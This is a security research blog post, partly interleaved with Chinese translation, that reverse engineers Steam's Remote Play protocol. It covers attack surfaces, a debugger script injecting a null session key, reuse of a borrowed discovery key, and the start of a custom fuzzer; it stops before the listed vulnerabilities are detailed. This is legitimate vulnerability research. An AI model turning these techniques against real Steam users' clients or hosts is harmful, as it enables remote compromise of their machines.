Achieving Remote Code Execution in Steam: a journey into the Remote Play protocol
Valve, the company behind the widespread videogame platform Steam, released in 2019 a feature called Remote Play Together. It allows sharing local multi-player games with friends over the network through streaming.
Valve 是广泛使用的视频游戏平台 Steam 背后的公司,于 2019 年发布了一项名为 Remote Play Together 的功能。它允许通过流媒体通过网络与朋友分享本地多人游戏。
The protocol associated with the Remote Play technology is elaborate enough to give rise to stimulating attack scenarios, and in the past its surface has scarcely been ventured into.
与远程播放技术相关的协议非常复杂,足以引发刺激性的攻击场景,而在过去,它的表面几乎没有被冒险涉足。
In this post, we will cover the reverse engineering of the protocol and its implementations within Steam (client and server), before going through a few vulnerabilities that were found with the help of a dedicated fuzzer.
在这篇文章中,我们将介绍该协议的逆向工程及其在 Steam(客户端和服务器)中的实现,然后介绍在专用模糊器的帮助下发现的一些漏洞。
Note: this work was presented at SSTIC 2023 — you can find the talk and the slides here. This post aims at giving a little bit more insight and figuring in some new elements of research that could not be showcased back then.
注意:这项工作是在 SSTIC 2023 上展示的——您可以在此处找到演讲和幻灯片。这篇文章旨在提供更多的见解,并弄清楚一些当时无法展示的研究新元素。In particular, we will discuss a critical Remote Code Execution vulnerability targeting the streaming client component.
具体而言,我们将讨论一个针对流式处理客户端组件的严重远程代码执行漏洞。
Table of Contents 目录
- Introduction 介绍
- Study of the Remote Play implementations in Steam
研究 Steam 中的远程游玩实现 - Main attack surfaces 主要攻击面
- Implementing a custom client and server
实现自定义客户端和服务器 - Implementing a dedicated fuzzer
实现专用模糊测试器 - Vulnerabilities 漏洞
- Path traversal file write in
CSetTouchIconDataMsg
路径遍历文件写入CSetTouchIconDataMsg
- Format string bugs in
CRemotePlayTogetherGroupUpdateMsg
格式化字符串错误CRemotePlayTogetherGroupUpdateMsg
- Request forgery in
CRemotePlayTogetherGroupUpdateMsg
请求CRemotePlayTogetherGroupUpdateMsg
伪造 - OOB access in
CRemotePlayTogetherGroupUpdateMsg
OOB 访问CRemotePlayTogetherGroupUpdateMsg
- Heap overflow in YV12 video frames
YV12 视频帧中的堆溢出 - Heap overflow in
CRemoteHIDMsg
gamepad logic
游戏手柄逻辑中的CRemoteHIDMsg
堆溢出
- Path traversal file write in
- Timeline 时间线
- Conclusion 结论
Introduction 介绍
Context and target 上下文和目标
More than a billion people around the world play online videogames on various platforms: Windows, Linux, macOS, Android, iOS, gaming consoles, VR headsets and more.
全球有超过 10 亿人在各种平台上玩在线视频游戏:Windows、Linux、macOS、Android、iOS、游戏机、VR 耳机等。
Online multiplayer games are also massive binaries with a large attack surface (network, gaming logic, graphics, sound, maps…). They are thus great targets for remote hackers, who can seek to exploit vulnerabilities in game clients or servers to fulfill various purposes: cheating, harvesting credentials, spreading malware, cryptomining, or even targeted surveillance.
在线多人游戏也是具有大攻击面(网络、游戏逻辑、图形、声音、地图……因此,它们是远程黑客的重要目标,他们可以寻求利用游戏客户端或服务器中的漏洞来实现各种目的:作弊、收集凭据、传播恶意软件、加密挖掘,甚至有针对性的监视。
Valve is a well-known game developer, editor and publisher. They have created many popular games, like Half-Life, Counter-Strike and Portal, as well as a game engine called the Source Engine. They seemed a nice target as they run a bug bounty program on HackerOne with many public reports. These can give great inspiration for attack surfaces and exploitation techniques related to Valve products.
Valve 是一家知名的游戏开发商、编辑和发行商。他们创造了许多流行的游戏,如《半条命》、《反恐精英》和《传送门》,以及一个名为 Source Engine 的游戏引擎。他们似乎是一个不错的目标,因为他们在 HackerOne 上运行了一个漏洞赏金计划,并有许多公开报告。这些可以为与 Valve 产品相关的攻击面和开发技术提供极大的启发。
Several people have already successfully discovered RCEs in games such as CS:GO, or inside the Source Engine. However, it seemed to me that less people have tried reverse engineering and finding vulnerabilities inside the Steam client itself, hence why I decided to take a look at it.
一些人已经在 CS:GO 等游戏中或源代码引擎中成功发现了 RCE。然而,在我看来,尝试逆向工程和发现 Steam 客户端本身内部漏洞的人越来越少,因此我决定看看它。
Steam is a software application developed by Valve and without a doubt the most widely used video game platform. It centralizes and distributes dozens of thousands of games, while holding a myriad of features related to social networking, game integration, streaming, inventories, markets, workshops, etc. In 2020, Steam reported 62M daily active users.
Steam 是由 Valve 开发的软件应用程序,无疑是使用最广泛的视频游戏平台。它集中和分发了数以万计的游戏,同时拥有与社交网络、游戏集成、流媒体、库存、市场、研讨会等相关的无数功能。2020 年,Steam 报告了 62M 的日活跃用户。
Here is an attempt to briefly summarize potential levels or layers of attack surfaces within Valve products:
下面试图简要总结 Valve 产品中潜在的攻击面级别或层:
The Steamworks API is a software development kit targeted towards game developers to integrate Steam features into their games: matchmaking, leaderboards, Steam Workshop, friends, invites and many more. This is a valuable attack surface as well as it can be a common vector in many games. For instance, in 2021, slidybat reported a stack buffer overflow in the DecompressVoice
method that impacted games with voice communications, like CS:GO.
Steamworks API 是一个软件开发工具包,面向游戏开发者,用于将 Steam 功能集成到他们的游戏中:匹配、排行榜、Steam 创意工坊、好友、邀请等等。这是一个有价值的攻击面,也可以成为许多游戏中的常见媒介。例如,在 2021 年,slidybat 报告了该方法中的堆栈缓冲区溢出,该 DecompressVoice
方法影响了具有语音通信的游戏,例如 CS:GO。
However, delving into the public reports, I never found mention of a particularly interesting component in the Steam client: Steam Remote Play.
然而,深入研究公开报告,我从未发现 Steam 客户端中提到一个特别有趣的组件:Steam Remote Play。
Steam Remote Play Steam 远程游玩
Steam Remote Play actually exists under various forms. It began with Steam Link, released in 2015. Initially a set-top box, its hardware version was discontinued in 2018 to make way for a software-based version, also sometimes called Steam In-Home Streaming.
Steam Remote Play 实际上以各种形式存在。它始于 2015 年发布的 Steam Link。最初是一个机顶盒,其硬件版本于 2018 年停产,为基于软件的版本让路,有时也称为 Steam 家庭流媒体。
Steam Link allows one to stream a game from their computer, usually a gaming rig, to another (typically less powerful) device, like a smartphone, a tablet or a TV. Consequently, there are Steam Link clients for Windows, Linux, Android and iOS.
Steam 流式盒允许人们将游戏从他们的电脑(通常是游戏装备)流式传输到另一台(通常功能较弱)的设备,如智能手机、平板电脑或电视。因此,有适用于 Windows、Linux、Android 和 iOS 的 Steam 流式盒客户端。
In 2019, Valve then introduced Remote Play Together, allowing players to share local multi-player games with their friends over the network through streaming. The player who streams the game, called the host, only has to send an invite link to another player, the guest (who does not need to own the game). The guest may send inputs (mouse, keyboard, controller…) to play together with the host if they are granted permission to.
2019 年,Valve 随后推出了 Remote Play Together,允许玩家通过流媒体通过网络与朋友分享本地多人游戏。流式传输游戏的玩家(称为主持人)只需向另一位玩家发送邀请链接,即访客(不需要拥有游戏)。如果获得许可,访客可以发送输入(鼠标、键盘、控制器等)与主持人一起玩。
Unsurprisingly, the protocol behind Steam Link and Remote Play Together is the same, so both products can be analyzed in order to reverse engineer the protocol. In terms of attack scenarios, Remote Play Together is however a more promising target.
不出所料,Steam 流式盒和 Remote Play Together 背后的协议是相同的,因此可以分析这两种产品以对协议进行逆向工程。然而,就攻击场景而言,Remote Play Together 是一个更有前途的目标。
Indeed, host and guest are connected through a peer-to-peer link (or through a transparent relay), meaning no third party will verify, filter or alter messages from host to guest and conversely. Moreover, both host-to-guest and guest-to-host attack scenarios are worth considering and interesting to investigate. Note that throughout this post, the terms client and guest will be used interchangeably, as well as the terms server and host.
事实上,主机和访客通过点对点链接(或通过透明中继)连接,这意味着没有第三方会验证、过滤或更改从主机到访客的消息,反之亦然。此外,主机到来宾和来宾到主机的攻击场景都值得考虑和研究。请注意,在这篇文章中,术语 client 和 guest 以及术语 server 和 host 可以互换使用。
Based on this information, two main attack scenarios against Remote Play Together can be thought of:
根据这些信息,可以考虑针对Remote Play Together的两种主要攻击场景:
- escaping the “game sandbox” to gain graphical remote access to the host’s desktop (client-side attackers only);
逃离“游戏沙盒”以获得对主机桌面的图形远程访问(仅限客户端攻击者); - exploiting vulnerabilities such as memory corruption to achieve RCE or info leak (for both client and server-side attackers).
利用内存损坏等漏洞实现 RCE 或信息泄露(针对客户端和服务器端攻击者)。
We didn’t delve into the first one at all, because it seemed that reversing the streaming, sandboxing and access control logic would prove harder than homing in on finding bugs in protocol parsing and message processing (maybe it’s not, who knows!).
我们根本没有深入研究第一个,因为似乎反转流媒体、沙盒和访问控制逻辑比在协议解析和消息处理中查找错误更难(也许不是,谁知道呢!
In addition, the latter accommodates better to fuzzing techniques, and can target both the client and the server implementations — thus this is what this post will focus on.
此外,后者更适合模糊测试技术,并且可以同时针对客户端和服务器实现——因此这就是本文将重点讨论的内容。
Both host-to-guest and guest-to-host attack scenarios are worth investigating, but it is important to notice that vulnerabilities in Remote Play Together have a stronger impact for guest players, as a client victim:
主机到访客和访客到主机的攻击场景都值得调查,但请务必注意,Remote Play Together 中的漏洞对作为客户端受害者的访客玩家的影响更大:
- does not need to own any particular game on Steam;
不需要在 Steam 上拥有任何特定游戏; - does not need to be friends with the attacker on Steam (anyone can open an invite link);
不需要在Steam上与攻击者成为好友(任何人都可以打开邀请链接); - automatically connects to the Remote Play server upon the link being opened (no further user interaction or confirmation).
打开链接后自动连接到 Remote Play 服务器(无需进一步的用户交互或确认)。
An invite link can even be opened without any user interaction under certain circumstances: for instance, if a
steam://
wrapper is hidden inside an iframe on a web page hosted on a trusted domain (see this report). This can turn a whole remote code execution zero-click!
在某些情况下,邀请链接甚至可以在没有任何用户交互的情况下打开:例如,如果steam://
包装器隐藏在托管在受信任域上的网页的 iframe 中(请参阅此报告)。这可以使整个远程代码执行零点击!
NB: we chose to focus on the Windows binaries, because those are the most popular and vulnerabilities in them would impact the most people.
注意:我们选择专注于 Windows 二进制文件,因为这些二进制文件是最受欢迎的,其中的漏洞会影响大多数人。
Study of the Remote Play implementations in Steam
研究 Steam 中的远程游玩实现
Software architecture 软件架构
Remote Play involves two main binaries: streaming_client.exe
, spawned by Steam upon joining a session and which contains all of the client logic, and SteamUI.dll
, where most of the server’s logic is located. Like most of Steam, these are written in C++. Analyzing them will provide answers to questions such as how do client and server communicate, what is the packet format, where in the binaries do packets arrive, or how is audio and video data exchanged.
Remote Play 涉及两个主要的二进制文件: streaming_client.exe
,由 Steam 在加入会话时生成,其中包含所有客户端逻辑,以及 SteamUI.dll
,服务器的大部分逻辑都位于其中。像大多数Steam一样,这些都是用C++编写的。分析它们将提供诸如客户端和服务器如何通信、数据包格式是什么、数据包到达二进制文件中的位置或音频和视频数据如何交换等问题的答案。
These rather large binaries (15MB) are exempt from any debug symbol, making the analysis much more laborious. Fortunately, there is another way.
这些相当大的二进制文件(15MB)不受任何调试符号的影响,这使得分析更加费力。幸运的是,还有另一种方法。
The Steam Link client for Android (native library) curiously happens to contain a lot of debug symbols, and more especially function names. Although this may be some kind of compilation or distribution error from Valve, this is definitely a heaven-sent fact for reversers.
奇怪的是,适用于 Android 的 Steam 流式盒客户端(原生库)恰好包含大量调试符号,尤其是函数名称。虽然这可能是 Valve 的某种编译或分发错误,但对于反向者来说,这绝对是天赐的事实。
Therefore, even though we target Windows environments, most of the analysis for the protocol can be performed on the Android client. The following diagram shows a high-level architecture of the client implementation.
因此,即使我们以 Windows 环境为目标,协议的大部分分析都可以在 Android 客户端上执行。下图显示了客户端实现的高级体系结构。
Some important dependencies include the Protobuf library, leveraged to serialize messages in the Remote Play protocol (and also used extensively within Valve games and Steam more generally), and SDL, which is mainly used for GUI, audio/video rendering, and interfacing with input devices (keyboard, controllers…).
一些重要的依赖项包括 Protobuf 库,用于序列化 Remote Play 协议中的消息(也更广泛地用于 Valve 游戏和 Steam),以及 SDL,主要用于 GUI、音频/视频渲染以及与输入设备(键盘、控制器等)的接口。
At the foundation of the client lies a rather large component, the Steam Networking Sockets library, in charge of P2P transport. It seems to be at least partially based on Valve’s Game Networking Sockets (GNS), an open-source UDP connection-oriented transport layer with support of many features such as encryption and P2P.
客户端的基础是一个相当大的组件,即负责 P2P 传输的 Steam 网络套接字库。它似乎至少部分基于 Valve 的游戏网络套接字 (GNS),这是一个开源的面向 UDP 连接的传输层,支持加密和 P2P 等许多功能。
A brief analysis suggested that Valve may use a heavily modified version of GNS. Indeed, the P2P part of GNS is based on WebRTC and the ICE protocol, but Remote Play doesn’t seem to implement the full WebRTC stack: it mostly consists of TURN/STUN and custom encryption layers with clear deviations from GNS. It was decided not to investigate this component further because in the context of Remote Play, attack scenarios involving this library are much more complex.
一个简短的分析表明,Valve可能使用了经过大量修改的GNS版本。事实上,GNS 的 P2P 部分基于 WebRTC 和 ICE 协议,但 Remote Play 似乎并没有实现完整的 WebRTC 堆栈:它主要由 TURN/STUN 和自定义加密层组成,与 GNS 有明显的偏差。我们决定不进一步调查此组件,因为在 Remote Play 的上下文中,涉及此库的攻击场景要复杂得多。
As for the server implementation, its architecture is quite similar to the client’s, without the human interface part. It is also worth noting the server implementation is part of a bigger DLL that contains lots of other Steam-related stuff that are not linked to Remote Play.
Reverse engineering the protocol
To get started on reverse engineering the protocol, there exists a tremendously useful Protobufs repository on GitHub, maintained by the SteamDB project. It tracks many protobuf definitions from Valve products.
More particularly, the steammessages_remoteplay.proto
file is simply put a goldmine to get started on reversing the protocol, as it includes pretty much all the message types and their fields. Of course, efforts do not stop now; there is still a lot to unpack by reversing the binaries, and the first step is to understand how packets are received and processed.
Network reception logic and processing
The following diagram shows a high-level view of the data flow for packets that arrive from the server.
下图显示了从服务器到达的数据包的数据流的高级视图。
Having a clearer overview of this part of the architecture helps a lot, on one hand, to understand the protocol, and on the other hand, to bring out potential attack surfaces.
一方面,更清楚地了解架构的这一部分有助于理解协议,另一方面有助于揭示潜在的攻击面。
From this figure, we can pinpoint three main components.
从这张图中,我们可以确定三个主要组成部分。
First, there’s the network reception logic on the left, which depends on the chosen transport mode. It is characterized by an interface called IStreamTransport
, which implements primitives for sending and receiving data. This way, we don’t need to worry whether direct UDP, Steam Datagram Relays or WebRTC was used for the P2P link: all packets end up in the CStreamSocket::HandlePacket
method at some point.
首先,左侧是网络接收逻辑,这取决于所选的传输模式。它的特点是一个名为 IStreamTransport
的接口,它实现了用于发送和接收数据的基元。这样,我们就无需担心 P2P 链路是否使用了直接 UDP、Steam 数据报中继或 WebRTC:所有数据包都会在某个时候进入该 CStreamSocket::HandlePacket
方法。
Next, the purple block implements header parsing logic. The classes in this component reveal a lot of fields, mechanisms and concepts within the protocol: for example, flags, checksums (CRC32C), the existence of different packet types (Connect, Disconnect, Data, Ack…) and a system of channels.
接下来,紫色块实现标头解析逻辑。该组件中的类揭示了协议中的许多字段、机制和概念:例如,标志、校验和 (CRC32C)、不同数据包类型(连接、断开连接、数据、确认等)的存在以及通道系统。
Finally, after passing through different queues and systems related to reassembling and fragmentation, the packets land in CStreamClients
’s OnStreamPacket
method, where they are then handled differently depending on the channel they are associated to.
最后,在经过与重组和分段相关的不同队列和系统后,数据包以 CStreamClients
OnStreamPacket
的方法登陆,然后根据它们关联的信道以不同的方式处理它们。
Channel system 渠道系统
Channels are an abstraction layer for the transport of parallel data, and are represented by identifiers between 0 and 31:
通道是用于传输并行数据的抽象层,由 0 到 31 之间的标识符表示:
enum EStreamChannel {
k_EStreamChannelInvalid = -1;
k_EStreamChannelDiscovery = 0;
k_EStreamChannelControl = 1;
k_EStreamChannelStats = 2;
k_EStreamChannelDataChannelStart = 3;
}
A few channels are statically allocated, the most important ones being the control channel (0x1) and the stats channel (0x2). The stats channel allows to communicate statistics, events, debug logs and screenshots. As for audio and video streams, they are dynamically allocated a data channel (0x3-0x1f) upon request from the server (or the client for microphone audio data).
一些通道是静态分配的,最重要的通道是控制通道 (0x1) 和统计通道 (0x2)。统计信息通道允许传达统计信息、事件、调试日志和屏幕截图。对于音频和视频流,它们会根据服务器(或麦克风音频数据的客户端)的请求动态分配一个数据通道 (0x3-0x1f)。
The control channel (0x1) is the channel that contains the most different types of messages (around a hundred). The enum EStreamControlMessage
defines the control message types, which serve multifarious purposes:
- authenticating and negotiating upon connection;
- setting audio, video or network parameters;
- sending inputs (mouse, keyboard, controller, touchscreen);
- sharing information about the lobby (game, players);
- interacting with remote HID devices;
- editing the client’s cursor, icon, window title…
Message format
The analysis of the components involved in header parsing allows to reconstruct the format of the packets that are exchanged. The following diagram is a typical example of what a control packet may look like.
The different fields will not be described in detail as the goal of this post is not to write a specification for the protocol. I will say, though, that certain fields such as Connection ID, Fragment and Packet ID are very sensitive and need to be constructed carefully in order not to raise errors in the client or server and break the session.
Processing of control messages and cryptography
Zooming on the body parsing block from the higher-level view diagram yields the following flowchart, which describes how packets are dispatched in the client based on their channel and how control messages are handled:
Messages from the control channel are all encrypted, with the exception of Authentication and Handshake messages (1, 2, 6, 7). These are sent in plaintext because they are exchanged before the client is successfully authentified.
Before even the Remote Play session itself, client and server agree on a shared secret key, called the session key. How this key is agreed upon depends on the transport mode and is not relevant to our analysis — we only assume this key exists and is the one used to encrypt all messages.
Encrypted control message bodies consist of:
- 1 byte to indicate the message type (
EStreamControlMessage
enum); - the message encrypted using the following formula, where Message is prefixed by an 8-byte sequence number (incremented every new control message):
AES-CBC(Message,SessionKey,IV=HMAC-MD5SessionKey(Message))
Upon reception, the session key and the IV are used to decrypt the message. Then, the IV, which also happens to be an HMAC of the message, is used to verify its integrity. Finally, the sequence number is checked. If anything goes wrong, the packet is discarded.
There is a special kind of control message called CRemoteHIDMsg
. It is related to remote HID device interaction and will be detailed further when mentioning attack surfaces.
The treatment of all other control messages is deferred, and later on, they are dispatched one at a time to their corresponding sub-handler.
Connection sequence diagram
Last but not least, here is a sequence diagram that can be reconstructed for the protocol:
Both the server and the client rely on a state machine. After connecting and performing a handshake, the client must send an Authentication Request. It contains an HMAC of a constant magic string ("Steam In-Home Streaming"
) using the session key. This way, the server ensures that the client knows the session key and will be able to decrypt future messages.
Then, they exchange various settings, such as the audio/video codecs to use or whether to enable certain features, through a negotiation phase.
Once the configuration is done, the client and the server enter the Streaming state, where they can freely exchange control packets and audio/video data.
Although this preliminary setup sequence can be subject to bugs, the Streaming state is more interesting for vulnerability research as it handles more complex data and exposes a larger attack surface.
Main attack surfaces
We can accordingly identify three main attack surfaces inside the parsing of message bodies. Each one will be covered in more detail.
Attack surface | Client -> Server | Server -> Client |
---|---|---|
Control messages | ~40 message types | ~50 message types |
Remote HID | 5 message types | 12 message types |
Audio/video data | Microphone | Game audio and video |
Note: there are actually two more attack surfaces, namely the connection phase and the parsing of headers (including the channel management and packet fragmentation systems). These surfaces are not very broad and were subject to manual vulnerability research. Nothing of interest was found.
Control messages
Control messages are the broadest and perhaps most valuable attack surface in Remote Play: there are almost a hundred different types of messages split between the client and the server. As stated earlier, they are all associated to a Protobuf structure.
While some of these are rather short and straightforward, others are more intricate and good targets for vulnerability research. For instance, the following message type features strings, bytes, index fields and an array of nested sub-messages — all of which could hide bugs (out-of-bounds accesses, integer overflows…).
message CRemotePlayTogetherGroupUpdateMsg {
message Player {
optional uint32 accountid = 1;
optional uint32 guestid = 2;
optional bool keyboard_enabled = 3;
optional bool mouse_enabled = 4;
optional bool controller_enabled = 5;
repeated uint32 controller_slots = 6;
optional bytes avatar_hash = 7;
}
repeated .CRemotePlayTogetherGroupUpdateMsg.Player players = 1;
optional int32 player_index = 2;
optional string miniprofile_location = 3;
optional string game_name = 4;
optional string avatar_location = 5;
}
Remote HID
Remote HID is a feature that allows the server to interact with the client’s human interface devices, such as USB controllers. The protobuf definition for the k_EStreamControlRemoteHID
message type is a rather enigmatic structure:
message CRemoteHIDMsg {
optional bytes data = 1;
optional bool active_input = 2;
}
Reversing shows that the data
field is actually nested serialized Protobuf data. More specifically, it is a serialized CHIDMessageToRemote
message (for client targets) or a serialized CHIDMessageFromRemote
message (for server targets). The definition to these messages can be found in another file, steammessages_hiddevices.proto.
The CHIDMessageToRemote
message looks like this:
message CHIDMessageToRemote {
// <snip>
optional uint32 request_id = 1;
oneof command {
.CHIDMessageToRemote.DeviceOpen device_open=2;
.CHIDMessageToRemote.DeviceClose device_close=3;
.CHIDMessageToRemote.DeviceWrite device_write=4;
.CHIDMessageToRemote.DeviceRead device_read=5;
.CHIDMessageToRemote.DeviceSendFeatureReport device_send_feature_report=6;
.CHIDMessageToRemote.DeviceGetFeatureReport device_get_feature_report=7;
.CHIDMessageToRemote.DeviceGetVendorString device_get_vendor_string=8;
.CHIDMessageToRemote.DeviceGetProductString device_get_product_string=9;
.CHIDMessageToRemote.DeviceGetSerialNumberString device_get_serial_number_string=10;
.CHIDMessageToRemote.DeviceStartInputReports device_start_input_reports=11;
.CHIDMessageToRemote.DeviceRequestFullReport device_request_full_report=12;
.CHIDMessageToRemote.DeviceDisconnect device_disconnect=13;
}
}
We understand that remote HID is a whole sub-protocol. The request_id
field tags messages in order to keep track of which request the server responds to. Then, one of the 12 sub-message types is nested. These allow to open a client device, read from it, write to it, and obtain various metadata.
The actions that are performed and the data that is sent back obviously depend on the type of plugged-in device, hence why the list of commands is actually an interface for which there exist multiple implementations:
Implementation | Can be triggered via… |
---|---|
CVirtualController |
Virtual touch device in the client settings |
CHIDDeviceSDLGamepad |
USB controller, handled by SDL |
CHIDDeviceSDLJoystick |
USB joystick, handled by SDL |
CHIDDeviceLocal |
Manually opening device via SDL API or raw IOCTL (fallback) |
In terms of attack surfaces, only the first three implementations are of interest, as the local device one is entirely device-specific (no client logic).
The caveat is that since each implementation is specific to a type of device, it is harder to look for bugs without owning or emulating them, and bugs themselves can highly depend on the client device which is not under control of the attacker.
As for the messages that the client can send to the server:
oneof command {
.CHIDMessageFromRemote.UpdateDeviceList update_device_list = 1;
.CHIDMessageFromRemote.RequestResponse response = 2;
.CHIDMessageFromRemote.DeviceInputReports reports = 3;
.CHIDMessageFromRemote.CloseDevice close_device = 4;
.CHIDMessageFromRemote.CloseAllDevices close_all_devices = 5;
}
The client can announce its list of available devices (gamepad, joysticks…) through the UpdateDeviceList
message. They can also answer a read request or a feature report request with specific data.
Remote HID is therefore a tempting attack surface: it adds 17 new message types in total, and as their purpose is to interface with devices, they operate at a slightly lower level.
Audio/video data
In data channels, the sub-handling logic primarily depends on the codec that was selected by the channel opener. The following tree diagram shows the different codecs and formats that are implemented in Remote Play.
The most interesting codecs are the raw ones, because they implement custom logic, unlike other codecs that usually leverage third-party libraries (e.g. libopus).
It is also worth noting most codecs actually do not implement encryption (which is rather odd since audio or video communications can carry sensitive data; although it is not that much of a security issue in a remote SDR/WebRTC context backed by underlying encryption layers).
Data packets embed a whole new layer of data, encapsulated within an additional header. Although all the fields were not clearly figured out, the following information is enough to, as a server, be able to send audio or video data that the client understands and renders:
Field | Size (bytes) |
---|---|
Data message type | 1 |
Sequence number 1 | 2 |
Timestamp | 4 |
Unknown | 6 |
Sequence number 2 | 2 |
Flags | 1 |
Unknown | 4 |
Timestamps have to be non-null and increasing. Some observations showed that the unknown fields were always null and that the sequence number fields were usually equal, except for audio data where the second one is null.
It also appears that for some reason, the three last fields were at times not present in certain codecs, like the raw video one.
This new knowledge allows to trigger new paths in the binary related to decoding audio and video data for each codec/format. These are an interesting surface because such functions may be more prone to memory corruption bugs.
Implementing a custom client and server
This section explains how a client and a server for the Remote Play protocol were reimplemented in Python. Their first purpose was to easily play around with the protocol and send custom messages manually. These implementations eventually grew into an ad hoc fuzzer, which next section will be dedicated to.
Choice of transport mode
We briefly mentioned earlier that Remote Play implements several modes of transport, given by the EStreamTransport
enum. Some examples are UDP, relay UDP, WebRTC and SDR (Steam Datagram Relays).
A few tests showed that the preferred network transport mode that was automatically used by the Remote Play client and server in Steam was SDR relaying. However, the most simple transport mode is direct UDP (k_EStreamTransportUDP
), for clients and hosts that can communicate directly without need for a peer-to-peer setup or relays.
Using direct UDP allows to focus on the Remote Play protocol itself by circumventing any potential SDR or WebRTC abstraction, making it much easier to carry out tests and develop a custom client or server implementation that works locally.
Server reimplementation
Reimplementing a server for the Remote Play protocol allowed to interface with the official streaming client in Steam. The latter can be started from the command line by specifying the transport mode (UDP) along with the server’s IP address and port.
"C:\Program Files (x86)\Steam\streaming_client.exe" --windowed --steamid 123 --gameid 456 --appid 789 --server 1.2.3.4:31337 --transport k_EStreamTransportUDP
However, there’s a catch. By running this binary directly, we have somewhat bypassed the key exchange scheme and once we get to the Authenticating state, the client cannot find any session key to load.
To address this issue, we can look for the first time in the client where the session key is supposed to be used: the CStreamClient::StartAuthentication
method. Indeed, in this state, the client needs to calculate an HMAC using the session key to authenticate to the host:
int __fastcall CStreamClient::StartAuthentication(CStreamClient *this) {
CAuthenticationRequestMsg Msg; // [sp+8h] [bp-58h] BYREF
_BYTE hmac[32]; // [sp+34h] [bp-2Ch] BYREF
CStreamClient::SetSessionState(this, AUTHENTICATING);
CAuthenticationRequestMsg::CAuthenticationRequestMsg(Msg);
CCrypto::GenerateHMAC256(
"Steam In-Home Streaming",
strlen("Steam In-Home Streaming"),
this->Key,
this->KeySize,
hmac
);
CAuthenticationRequestMsg::set_token(Msg, hmac, 0x20);
CStreamClient::SendControlMessage(
this,
k_EStreamControlAuthenticationRequest,
Msg
);
CAuthenticationRequestMsg::~CAuthenticationRequestMsg(Msg);
}
At this point in time, just before CCrypto::GenerateHMAC256
is called, we can inject our own session key in the CStreamClient
structure. To this purpose, a small x32dbg script was written to run the client with, that injects a 32-byte null key. This may be achieved through many other techniques (patching, DLL injection…).
erun
// Reach CStreamClient::StartAuthentication, just before the call
// to CCrypto::GenerateHMAC256. Offset will depend on Steam version.
// ebx needs to point the CStreamClient structure.
bp streaming_client:$10D9E5
erun
// New key (full null bytes)
alloc 32
$key = $result
fill $key, 0, 32
// Copy new key addr
mov dword:[ebx + 0x24], $key
// Copy key size (0x20)
set (ebx + 0x34), #20 00 00 00#
// Resume execution
erun
Once this issue has been addressed, the whole protocol can be reimplemented by leveraging the Protobuf definitions at disposal. It requires going through the connection phase and implementing a few basic messages (such as Keep Alive), before being able to send custom control messages to the client.
Client reimplementation
In order to target the server implementation, reimplementing a client required a little bit more work.
Setting up a Remote Play server directly through the invite mechanism that you can find in the Steam overlay when you are playing a game makes developing a client quite difficult, as the session will naturally be built over SDR or WebRTC.
There is, however, a way to circumvent this issue: forcing a direct UDP connection by hijacking a local Steam Link key.
Steam Link uses a separate protocol, called the Steam In-Home Streaming Discovery Protocol, for clients to discover devices that are available for streaming on a local network (or remotely with a PIN code system).
If Steam is launched and you have checked Enable Remote Play in the settings, you should be able to see your own machine appear.
Connecting to the machine then lands you inside your Steam library (through the Steam Big Picture UI).
What’s nice about the Discovery protocol, whose protobuf definitions are found in the steammessages_remoteclient_discovery.proto
definition file, is that a client can specify a list of supported modes of transport inside the CMsgRemoteDeviceStreamingRequest
message.
message CMsgRemoteDeviceStreamingRequest {
message ReservedGamepad {
optional uint32 controller_type = 1;
optional uint32 controller_subtype = 2;
}
required uint32 request_id = 1;
optional int32 maximum_resolution_x = 2;
optional int32 maximum_resolution_y = 3;
optional int32 audio_channel_count = 4 [default = 2];
optional string device_version = 5;
optional bool stream_desktop = 6;
optional bytes device_token = 7;
optional bytes pin = 8;
optional bool enable_video_streaming = 9 [default = true];
optional bool enable_audio_streaming = 10 [default = true];
optional bool enable_input_streaming = 11 [default = true];
optional bool network_test = 12;
optional uint64 client_id = 13;
repeated .EStreamTransport supported_transport = 14;
optional bool restricted = 15;
optional .EStreamDeviceFormFactor form_factor = 16;
optional int32 gamepad_count = 17;
repeated .CMsgRemoteDeviceStreamingRequest.ReservedGamepad gamepads = 18;
optional uint64 gameid = 19;
optional .EStreamInterface stream_interface = 20;
}
This way, one can ensure the connection will use direct UDP.
We will not go to the extent of detailing the whole discovery protocol in this post, but it needed to be reversed and reimplemented to be authenticated on a local Steam instance.
Indeed, when you discover and connect to a machine, your device gets paired to it by being assigned a client ID and by sharing a discovery key.
It is possible to borrow a discovery key (this can be performed only once, for example through debugging) and reuse it by plugging it inside the discovery protocol to go through.
The server eventually answers a Device Streaming Response that contains the port to connect to for the Remote Play session, as well as a randomly generated session key that can be decrypted using the client discovery key.
The rest of the client implementation process is quite similar to the server one.
Implementing a dedicated fuzzer
rpfuzz
: a fuzzer for the Remote Play protocol
The client and server reimplementations that were developed and detailed in the previous section were extensively used to play around with the protocol, and naturally evolved into a basic fuzzer, which was given the very unconventional name rpfuzz
(for remote play fuzzer).
The idea was to keep on playing around with the protocol by writing a little fuzzer from scratch on top of the existing code, to see if we could stumble upon “quick wins” by randomly mutating Protobuf messages.
The following diagram describes rpfuzz
’s software architecture.
The network component (orange block) is interchangeable: depending on the target, it can be replace by a server implementation, or by a client implementation (coupled with the discovery protocol). It is in charge of communicating with the target.
The Fuzzer component runs on a separate thread. It supports both control messages and audio/video channels.
Control message fuzzing is essentially stateless. It consists of a loop that randomly chooses a message type and passes on the associated protobuf class over to a mutation engine: pbfuzz
, which will be covered more in depth later. pbfuzz
sends back a Python object to generate an endless amount of mutations, which are assembled into messages and then sent to the target through the network implementation.
On the other hand, fuzzing remote HID messages requires stateful actions, such as sending a request to open a device. In the same way, fuzzing audio/video channels requires opening a new dynamic channel.
A few other nice features were implemented, namely a replay system, a scenario system and a logging system.
The Logger basically just saves all the sent mutations to a file for a fuzzing session. It helps keeping a fuzzing history. This is useful for debugging and analyzing crashes.
These logs can also be fed back to the Replay System, which will replay all the messages from a session one at a time. This can prove useful to try and reproduce a (deterministic enough) crash, by hopefully bringing the target to a state that has already been reached before.
Finally, a Scenario System was designed to write specific scenarios and play them at any time. It was especially useful to reproduce bugs and write proofs of concept. Besides, each bug scenario can specify a condition that should be necessarily verified by messages that trigger the associated bug. Thanks to this, the fuzzer knows when to avoid specific messages, and is not slowed down by already-found crashes.
pbfuzz
: a custom Protobuf mutation engine
pbfuzz
is — you guessed it — another unconventional name standing for protobuf fuzzer.
